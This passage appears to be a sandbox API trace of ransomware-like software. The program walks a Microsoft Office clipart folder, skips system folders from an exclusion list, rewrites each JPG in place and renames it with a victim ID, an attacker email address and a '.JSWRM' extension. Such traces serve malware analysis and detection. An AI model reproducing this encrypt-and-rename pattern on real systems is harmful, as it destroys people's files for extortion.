dwFlags=0x0, lpMem=0x2475b0 | out: hHeap=0x1e0000) returned 1 [0086.247] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210320 | out: hHeap=0x1e0000) returned 1 [0086.247] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2103b8 | out: hHeap=0x1e0000) returned 1 [0086.247] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xeaefe14, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xeaefe14, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xeaefe14, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x7d26, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0178639.JPG", cAlternateFileName="")) returned 1 [0086.247] lstrcmpiW (lpString1="J0178639.JPG", lpString2=".") returned 1 [0086.247] lstrcmpiW (lpString1="J0178639.JPG", lpString2="..") returned 1 [0086.247] lstrcmpiW (lpString1="J0178639.JPG", lpString2="...") returned 1 [0086.247] lstrcmpiW (lpString1="J0178639.JPG", lpString2="windows") returned -1 [0086.247] lstrcmpiW (lpString1="J0178639.JPG", lpString2="recovery") returned -1 [0086.247] lstrcmpiW (lpString1="J0178639.JPG", lpString2="perflogs") returned -1 [0086.247] lstrcmpiW (lpString1="J0178639.JPG", lpString2="documents and settings") returned 1 [0086.248] lstrcmpiW (lpString1="J0178639.JPG", lpString2="$RECYCLE.BIN") returned 1 [0086.248] lstrcmpiW (lpString1="J0178639.JPG", lpString2="system volume information") returned -1 [0086.248] lstrcmpiW (lpString1="J0178639.JPG", lpString2="msocache") returned -1 [0086.248] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412b8 [0086.248] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0178639.JPG", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0086.248] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0178639.JPG", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0178639.JPG", lpUsedDefaultChar=0x0) returned 12 [0086.248] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412b8 | out: hHeap=0x1e0000) returned 1 [0086.248] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f70 [0086.248] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0178639.JPG", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0086.248] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0178639.JPG", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0178639.JPG", lpUsedDefaultChar=0x0) returned 12 [0086.248] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f70 | out: hHeap=0x1e0000) returned 1 [0086.248] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210618 [0086.248] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210158 | out: hHeap=0x1e0000) returned 1 [0086.248] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0086.248] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0086.248] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ad8 [0086.248] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0178639.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0178639.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0086.248] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=32038) returned 1 [0086.248] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0086.248] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x7d20) returned 0x24d210 [0086.248] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x7d20, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x7d20, lpOverlapped=0x0) returned 1 [0086.252] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0086.252] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x7d20, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x7d20, lpOverlapped=0x0) returned 1 [0086.252] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0086.253] CloseHandle (hObject=0x314) returned 1 [0086.256] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2106b0 [0086.256] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0086.256] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0086.256] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0086.256] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0086.256] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0086.256] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0086.256] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a348 [0086.256] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a348, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0086.256] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a348 | out: hHeap=0x1e0000) returned 1 [0086.257] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cdf8 [0086.257] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2476a8 [0086.257] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cdf8 | out: hHeap=0x1e0000) returned 1 [0086.257] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0086.257] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0178639.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0178639.jpg"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0178639.JPG.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0178639.jpg.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0086.257] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2476a8 | out: hHeap=0x1e0000) returned 1 [0086.257] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2106b0 | out: hHeap=0x1e0000) returned 1 [0086.257] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ad8 | out: hHeap=0x1e0000) returned 1 [0086.257] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xeaefe14, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xeaefe14, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xeaefe14, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x8a0c, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0178932.JPG", cAlternateFileName="")) returned 1 [0086.257] lstrcmpiW (lpString1="J0178932.JPG", lpString2=".") returned 1 [0086.258] lstrcmpiW (lpString1="J0178932.JPG", lpString2="..") returned 1 [0086.258] lstrcmpiW (lpString1="J0178932.JPG", lpString2="...") returned 1 [0086.258] lstrcmpiW (lpString1="J0178932.JPG", lpString2="windows") returned -1 [0086.258] lstrcmpiW (lpString1="J0178932.JPG", lpString2="recovery") returned -1 [0086.258] lstrcmpiW (lpString1="J0178932.JPG", lpString2="perflogs") returned -1 [0086.258] lstrcmpiW (lpString1="J0178932.JPG", lpString2="documents and settings") returned 1 [0086.258] lstrcmpiW (lpString1="J0178932.JPG", lpString2="$RECYCLE.BIN") returned 1 [0086.258] lstrcmpiW (lpString1="J0178932.JPG", lpString2="system volume information") returned -1 [0086.258] lstrcmpiW (lpString1="J0178932.JPG", lpString2="msocache") returned -1 [0086.258] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0086.258] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0178932.JPG", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0086.258] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0178932.JPG", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0178932.JPG", lpUsedDefaultChar=0x0) returned 12 [0086.258] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0086.258] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0086.258] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0178932.JPG", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0086.258] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0178932.JPG", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0178932.JPG", lpUsedDefaultChar=0x0) returned 12 [0086.258] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0086.258] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ad8 [0086.258] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210618 | out: hHeap=0x1e0000) returned 1 [0086.258] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0086.258] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0086.258] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2107e0 [0086.258] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0178932.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0178932.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0086.260] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=35340) returned 1 [0086.260] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0086.260] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x8a00) returned 0x24d210 [0086.261] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x8a00, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x8a00, lpOverlapped=0x0) returned 1 [0086.264] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0086.265] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x8a00, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x8a00, lpOverlapped=0x0) returned 1 [0086.265] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0086.266] CloseHandle (hObject=0x314) returned 1 [0086.266] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210028 [0086.266] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0086.266] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0086.266] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0086.266] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0086.266] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0086.266] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0086.266] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a270 [0086.266] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a270, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0086.266] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a270 | out: hHeap=0x1e0000) returned 1 [0086.266] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d140 [0086.266] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247990 [0086.266] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d140 | out: hHeap=0x1e0000) returned 1 [0086.266] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0086.266] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0178932.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0178932.jpg"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0178932.JPG.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0178932.jpg.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0086.267] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247990 | out: hHeap=0x1e0000) returned 1 [0086.267] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210028 | out: hHeap=0x1e0000) returned 1 [0086.267] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2107e0 | out: hHeap=0x1e0000) returned 1 [0086.267] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xeaefe14, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xeaefe14, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xeaefe14, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x7d6e, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0179963.JPG", cAlternateFileName="")) returned 1 [0086.267] lstrcmpiW (lpString1="J0179963.JPG", lpString2=".") returned 1 [0086.267] lstrcmpiW (lpString1="J0179963.JPG", lpString2="..") returned 1 [0086.267] lstrcmpiW (lpString1="J0179963.JPG", lpString2="...") returned 1 [0086.267] lstrcmpiW (lpString1="J0179963.JPG", lpString2="windows") returned -1 [0086.267] lstrcmpiW (lpString1="J0179963.JPG", lpString2="recovery") returned -1 [0086.267] lstrcmpiW (lpString1="J0179963.JPG", lpString2="perflogs") returned -1 [0086.267] lstrcmpiW (lpString1="J0179963.JPG", lpString2="documents and settings") returned 1 [0086.267] lstrcmpiW (lpString1="J0179963.JPG", lpString2="$RECYCLE.BIN") returned 1 [0086.267] lstrcmpiW (lpString1="J0179963.JPG", lpString2="system volume information") returned -1 [0086.267] lstrcmpiW (lpString1="J0179963.JPG", lpString2="msocache") returned -1 [0086.267] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241100 [0086.267] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0179963.JPG", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0086.267] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0179963.JPG", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0179963.JPG", lpUsedDefaultChar=0x0) returned 12 [0086.267] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241100 | out: hHeap=0x1e0000) returned 1 [0086.267] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0086.267] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0179963.JPG", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0086.267] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0179963.JPG", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0179963.JPG", lpUsedDefaultChar=0x0) returned 12 [0086.267] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0086.267] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210320 [0086.267] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ad8 | out: hHeap=0x1e0000) returned 1 [0086.267] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0086.267] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0086.267] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2101f0 [0086.267] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0179963.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0179963.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0086.355] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=32110) returned 1 [0086.355] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0086.355] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x7d60) returned 0x24d210 [0086.356] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x7d60, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x7d60, lpOverlapped=0x0) returned 1 [0086.360] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0086.360] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x7d60, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x7d60, lpOverlapped=0x0) returned 1 [0086.360] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0086.361] CloseHandle (hObject=0x314) returned 1 [0086.361] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2107e0 [0086.361] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0086.361] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0086.361] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0086.361] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0086.362] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0086.362] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0086.362] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3c0 [0086.362] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3c0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0086.362] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3c0 | out: hHeap=0x1e0000) returned 1 [0086.362] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d878 [0086.362] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2477a0 [0086.362] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d878 | out: hHeap=0x1e0000) returned 1 [0086.362] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0086.362] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0179963.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0179963.jpg"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0179963.JPG.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0179963.jpg.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0086.363] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2477a0 | out: hHeap=0x1e0000) returned 1 [0086.363] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2107e0 | out: hHeap=0x1e0000) returned 1 [0086.363] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2101f0 | out: hHeap=0x1e0000) returned 1 [0086.363] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xeac9c22, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xeac9c22, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xeaefe14, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x40e7, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0182689.JPG", cAlternateFileName="")) returned 1 [0086.363] lstrcmpiW (lpString1="J0182689.JPG", lpString2=".") returned 1 [0086.363] lstrcmpiW (lpString1="J0182689.JPG", lpString2="..") returned 1 [0086.363] lstrcmpiW (lpString1="J0182689.JPG", lpString2="...") returned 1 [0086.363] lstrcmpiW (lpString1="J0182689.JPG", lpString2="windows") returned -1 [0086.363] lstrcmpiW (lpString1="J0182689.JPG", lpString2="recovery") returned -1 [0086.363] lstrcmpiW (lpString1="J0182689.JPG", lpString2="perflogs") returned -1 [0086.363] lstrcmpiW (lpString1="J0182689.JPG", lpString2="documents and settings") returned 1 [0086.363] lstrcmpiW (lpString1="J0182689.JPG", lpString2="$RECYCLE.BIN") returned 1 [0086.363] lstrcmpiW (lpString1="J0182689.JPG", lpString2="system volume information") returned -1 [0086.363] lstrcmpiW (lpString1="J0182689.JPG", lpString2="msocache") returned -1 [0086.363] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241060 [0086.363] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0182689.JPG", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0086.363] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0182689.JPG", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: 